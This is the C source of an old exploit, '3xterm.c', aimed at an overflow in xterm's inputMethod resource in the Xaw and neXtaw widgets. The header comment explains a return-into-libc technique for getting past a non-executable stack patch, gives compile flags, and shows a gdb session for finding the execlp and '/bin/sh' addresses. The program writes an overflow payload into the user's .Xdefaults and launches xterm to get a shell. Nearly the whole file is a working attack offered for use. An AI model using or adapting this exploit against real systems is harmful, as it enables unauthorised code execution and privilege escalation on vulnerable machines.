/*

A simple xploit working around non-executable stack patch! ;)
Based on Solar Designer's: "Getting around non-executable stack(fix)" post and:
RafaĦ Wojtczuk's "Defeating Solar Designer'a Non-executable Stack Patch"

sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets based on
xterm_exp.c by alcuin

Compile it like this:
gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc


Description:
The sploit simply puts the EXECLP address and its parameters addresses
onto the stack. To work fine you need to look for execlp Program Linkage
Table entry in xterm and for "/bin/sh" string in its text segment...

emsi:~mcmar/hack# gdb xterm
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
(gdb) print execlp
$1 = {<text variable, no debug info>} 0x804bc78 <execlp>
(gdb) x/s 0x8063d2e
0x8063d2e <_fini+8158>:  "/bin/sh"

0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the
right ones in your case... ;)

GreetZ: bulba, smierc, all of  Lam3rZ teem and other Polish HackerZ ;)

*/


#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>


#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

#define EXECLP 0x804bc78  // execlp PLT adress in xterm
#define BIN_SH 0x8063d2e  // "/bin/sh" string address in xterm ;)


int *ptr;

int main(int argc, char *argv[]) {

  char *home;
  FILE *f_in, *f_out;
  char shellbuf[16384];
  char buff[16384];
  char *s;
  int i;

  if (home = getenv("HOME")) chdir(home);

  if (!(f_out = fopen(NEWFILE, "w"))) {
    perror("fopen");
    exit(1);
  }

  if (f_in = fopen(CONFFILE, "r")) {
    fseek(f_in,0,SEEK_SET);
    while (!feof(f_in)) {
      fgets(buff,16384,f_in);
      for (s=buff;isblank(*s);s++);
      if (strncmp(s,"xterm*inputMethod",17)<0)
        fputs(buff,f_out);
    }
    fclose(f_in);
  }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;


  ptr = (int *)(shellbuf+1028);
  *ptr++ =EXECLP;
  *ptr++ =EXECLP;
  *ptr++ =BIN_SH;
  *ptr++ =BIN_SH;
  *ptr++ = 0;


  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);

  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);

  execl("/usr/X11R6/bin/xterm","xterm",NULL);
}